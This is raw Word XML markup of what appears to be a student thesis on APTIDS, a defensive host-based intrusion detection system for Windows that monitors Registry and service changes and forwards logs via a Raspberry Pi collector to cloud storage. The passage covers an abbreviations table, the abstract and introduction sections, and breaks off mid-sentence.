          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Host-based Intrusion Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D26C9E">
              <w:t>IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00D26C9E">
              <w:t>Intrusion Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Local Area Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Procedure Call</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Procedure Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Service Control Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Service Control Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Security Information and Event Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21216" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>DHCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Dynamic Host Configuration Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21216" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>DLCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C21216" w:rsidRDefault="00C21216" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Distributed Log Collector Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A23FC" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>CLSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008A23FC" w:rsidRDefault="008A23FC" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Centralize Log Storage System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D26C9E" w:rsidRPr="00600BA7" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26C9E" w:rsidRDefault="00D26C9E" w:rsidP="00D26C9E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF4EA3" w:rsidRPr="00600BA7" w:rsidRDefault="003725C1" w:rsidP="00E445CE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:spacing w:line="358" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E445CE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B89" w:rsidRDefault="00B02E5E" w:rsidP="000C0B89">
      <w:pPr>
        <w:spacing w:line="358" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1"/>
        <w:sectPr w:rsidR="000C0B89" w:rsidSect="00E31F6B">
          <w:headerReference w:type="even" r:id="rId8"/>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:headerReference w:type="first" r:id="rId12"/>
          <w:footerReference w:type="first" r:id="rId13"/>
          <w:pgSz w:w="11909" w:h="16834" w:code="9"/>
          <w:pgMar w:top="1588" w:right="1134" w:bottom="1871" w:left="1985" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We have developed a </w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve"> behavior analysis </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>solution</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> Operation System</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t xml:space="preserve"> Advanced Persistent Threat Inspection Detection System</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t>APTIDS</w:t>
      </w:r>
      <w:r w:rsidR="003725C1">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve">, which is an open </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>solution combined of a System Monitoring Software, a Dis</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve">tributed Log Collector Hardware, </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>Centralized Log Storage on Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> and a respond tool kit called Sentry</w:t>
      </w:r>
      <w:r w:rsidR="00126710">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve">Just like others </w:t>
      </w:r>
      <w:r w:rsidR="002B600A">
        <w:t xml:space="preserve">well know open source </w:t>
      </w:r>
      <w:r w:rsidR="00790A80">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>ost IDS,</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> the software agent of </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve">APTIDS has abilities to monitor some common sectors of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> OS like </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>, Service. Furthermore, we have developed an ability to allow A</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve">PTIDS to send collected logs to the </w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> which is </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>a Log Collector built</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> on a Raspb</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>erry Pi, and from that hardware</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> another collector will push all the collected log to </w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t xml:space="preserve"> centralized log storage</w:t>
      </w:r>
      <w:r w:rsidR="002558B0">
        <w:t xml:space="preserve"> on cloud</w:t>
      </w:r>
      <w:r w:rsidR="009C38F0">
        <w:t>. APTIDS can monitor and alert on its runtime, that means if any malicious activity takes place at where APTIDS is monitoring, APTIDS will capture that activity, write lo</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t>g, and alert to the log storage. When</w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t xml:space="preserve"> any</w:t>
      </w:r>
      <w:r w:rsidR="00CE7B77">
        <w:t xml:space="preserve"> incident takes place, </w:t>
      </w:r>
      <w:r w:rsidR="00E73A17">
        <w:t>respond team uses Sentry for analyzing and finding APT source and their persistent executable programs and terminate the threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B02E5E" w:rsidRPr="00E445CE" w:rsidRDefault="00A94DD6" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc484962976"/>
      <w:r w:rsidRPr="00E445CE">
        <w:lastRenderedPageBreak/>
        <w:t>INTRODUCTION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00A94DD6" w:rsidRDefault="00235F8C" w:rsidP="006565FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc484962977"/>
      <w:r>
        <w:t>Motivation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="0047771F" w:rsidRDefault="00196A18" w:rsidP="00BE402E">
      <w:r>
        <w:t>Nowadays, with the rapid advance and wide spread of modern threats, computer users are facing threa</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t>ts from everywhere</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t xml:space="preserve"> From the most complicated malwares those can transform themselves to create many variants, to those that encrypt the whole computer and keep our information as hostage. For fighting back those advanced threats that are terrorizing the Internet, many company have developed antivirus software</w:t>
      </w:r>
      <w:r w:rsidR="00245FA6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0072132A">
        <w:t xml:space="preserve">. To protect the innocent Internet civilians from the cyberwar that are taking place, antivirus softwares come from a free price for basic protection, to some hundred dollars for full protection against most modern attack vectors. </w:t>
      </w:r>
      <w:r w:rsidR="00245FA6">
        <w:t>Personal Antivirus software is very powerful for protecting a normal user from many security threats. But their shortcoming is that they can only protect a sin</w:t>
      </w:r>
      <w:r w:rsidR="0047771F">
        <w:t xml:space="preserve">gle user at one, and if there are more than one user who want to be protected, they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0047771F">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0047771F">
        <w:t xml:space="preserve"> buy more than one AV software, install them separately and there is no way to monitor and manage logs from all those softwares simultaneously. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE4B36" w:rsidRDefault="0032487F" w:rsidP="00BE402E">
      <w:r>
        <w:t>Enterprise Antivirus System</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> come </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> full qualified</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>protection</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> for big</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> enterprise</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>, campus</w:t>
      </w:r>
      <w:r>
        <w:t>es or companies</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>. They</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> support for monitoring and protecting hundreds</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00FE4B36">
        <w:t xml:space="preserve"> users, and manage their logs of activities in some central cloud storage systems. </w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t>However, the price for such</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>platinum protection is</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t>very</w:t>
      </w:r>
      <w:r w:rsidR="008C06C7">
        <w:t xml:space="preserve"> expensive, and </w:t>
      </w:r>
      <w:r>
        <w:t>it is</w:t>
      </w:r>
      <w:r w:rsidR="006A3B63">
        <w:t xml:space="preserve"> sophisticated for maintaining and operating and especially for protecting small companies or households. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="00BE402E">
      <w:r>
        <w:t xml:space="preserve">From all those shortcomings </w:t>
      </w:r>
      <w:r w:rsidR="00E2646F">
        <w:t>of modern Antivirus Softwares an</w:t>
      </w:r>
      <w:r>
        <w:t>d Security Protection Systems, we want to develop a solution for helping small companies and households to protect themselves against advance threats.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc484962978"/>
      <w:r>
        <w:t>Thesis’ statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:r>
        <w:t xml:space="preserve">Successfully develop and run APTIDS for monitoring malicious behaviors of software on </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Operating Systems. APTIDS monitor </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and service for detecting softwares that are trying to write the path of their executable files. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990FA2" w:rsidRPr="00990FA2" w:rsidRDefault="00990FA2" w:rsidP="00990FA2">
      <w:r>
        <w:t>Testing APTIDS by using some common malwares running in a controllable environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc484962979"/>
      <w:r>
        <w:t>Subject</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00F77A4C" w:rsidRPr="00F77A4C" w:rsidRDefault="00964D71" w:rsidP="00F77A4C">
      <w:r>
        <w:t xml:space="preserve">Research on how malwares store themselves on </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System for running on start up. In addition, research on how Graylog work</w:t>
      </w:r>
      <w:r w:rsidR="00062D79">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, the method for collector logs and push them to SIEM for storage and analyzing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc484962980"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="004C6A4E" w:rsidRPr="004C6A4E" w:rsidRDefault="004C6A4E" w:rsidP="004C6A4E">
      <w:r>
        <w:t xml:space="preserve">APTIDS can monitor activities in some factions of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003F301F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00A240EA">
        <w:t xml:space="preserve"> the creation and deletion of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Services. Since it has been developed in a </w:t>
      </w:r>
      <w:r w:rsidR="002D356E">
        <w:t>limited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> time, it does not have full features like other</w:t>
      </w:r>
      <w:r w:rsidR="00A240EA">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> well-known antivirus softwares.</w:t>
      </w:r>
      <w:r w:rsidR="002D356E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A3B63" w:rsidRDefault="006A3B63" w:rsidP="006A3B63">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc484962981"/>
      <w:r>
        <w:t xml:space="preserve">The needs of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> monitoring module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00F9659F" w:rsidRPr="00F9659F" w:rsidRDefault="00F9659F" w:rsidP="00F9659F">
      <w:r>
        <w:t>Malwares usually store th</w:t>
      </w:r>
      <w:r w:rsidR="00095BB2">
        <w:t>e path lead to their executable applications</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00284E83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-755055843"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:instrText xml:space="preserve"> CITATION Registry \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C111F5">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(1)</w:t>
          </w:r>
          <w:r w:rsidR="00FB2DC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="0032487F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in case the system </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
